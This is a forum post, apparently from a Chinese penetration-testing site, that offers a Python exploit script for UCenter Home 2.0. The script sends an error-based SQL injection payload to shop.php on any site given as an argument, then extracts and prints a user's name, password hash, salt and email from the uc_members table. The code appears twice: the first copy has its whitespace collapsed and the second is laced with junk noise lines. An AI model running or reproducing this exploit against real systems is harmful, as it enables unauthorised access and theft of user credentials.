中国网络渗透测试联盟
标题:
UCenter Home 2.0 EXP
[打印本页]
作者:
admin
时间:
2013-1-23 09:18
标题:
UCenter Home 2.0 EXP
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:
http://www.exploit-db.com/exploits/14997/'
print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
! b( T3 a6 ?+ V& ^! G$ w
4 U+ U1 j7 E: m) N
$ n! q8 z' H" r* ?' x
#!/usr/bin/env python
/ @* [ `6 V8 M' J; P \
2 @5 s2 d' V+ f7 V8 ]# b. I
import sys
" J/ g( _. a. x% n# A, i j' P: P
import urllib2
: A5 _: I4 V1 S) }$ r
import re
3 P2 Z: [/ H8 J% r! Q+ r: G
8 V' L. }4 p* ~" U4 z4 q' [
def info():
+ [% W% Q! m7 S. k8 V8 U
print 'From:
http://www.exploit-db.com/exploits/14997/'
+ c% d" R+ C# d5 R' n
print 'http://www.hake.cc/Web_loudong/'
/ q/ W* u$ y# u* l
print 'changed:qiaoy'
) J. t. e% V8 e+ k
print 'exp:'
) v9 ~- X/ h8 \" V
print ' ./UCenter_Home_2.0.py site'
& Z* K# g; P8 A! R8 H9 M5 J+ N
0 w/ }$ k5 m4 e3 y- a) h& y( P
def main():
5 f3 v# I8 _" _0 R) M) K# ?
if len(sys.argv) != 2:
8 p* v9 u( h0 j% z
info()
/ w7 H: `$ ~2 x+ L3 r
else:
6 d1 E& V# d2 Y& B
site = sys.argv[1]
/ X& \0 |+ W7 i
if site[0:7] == 'http://':
/ o: {8 o" B4 R7 @' N/ t
sitesite =site
/ J8 |# S5 u9 o( ~2 X* e& p3 i
elif site[0:8] == 'https://':
1 C/ y& P3 ]7 p& D) A
sitesite = site
3 y) |, @' e' K4 ^
else:
) i W; z) j& l8 x
site = 'http://'+site
( r+ g% O# d: v1 z8 a4 \: b# z9 ~
try:
+ l! _8 h2 r7 b- L) e
url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'
M0 Z+ F# {& A3 {2 d- o0 ^
Value = urllib2.urlopen(url).read()
2 q/ _3 e4 J4 d6 r% b' l
Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]
, S5 ^, P i' w& J
hacked = Msg.split(':')
8 j4 w" N- ^2 q# P, J9 v9 F/ f% r' v
print 'Name: '+hacked[1]
0 j9 T+ |) w$ s" S3 t/ G
print 'Passwd: '+hacked[2]
- h I3 C' |" t" L3 U
print 'salt: '+hacked[3]
. \6 i' l/ \6 X" W) D
print 'email: '+hacked[4]
, \! P4 k4 G! Q/ b
except:
9 G9 c6 p7 |+ C8 c! a- ~* s9 s+ F
print 'Sorry,I can\'t work............'
0 j4 x! T# O$ t$ a3 t" h
4 m$ t8 d% ^. a! t- Y2 d" W
if __name__ == '__main__':
' ?4 n2 b G: N2 u1 I6 M8 c
main()
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2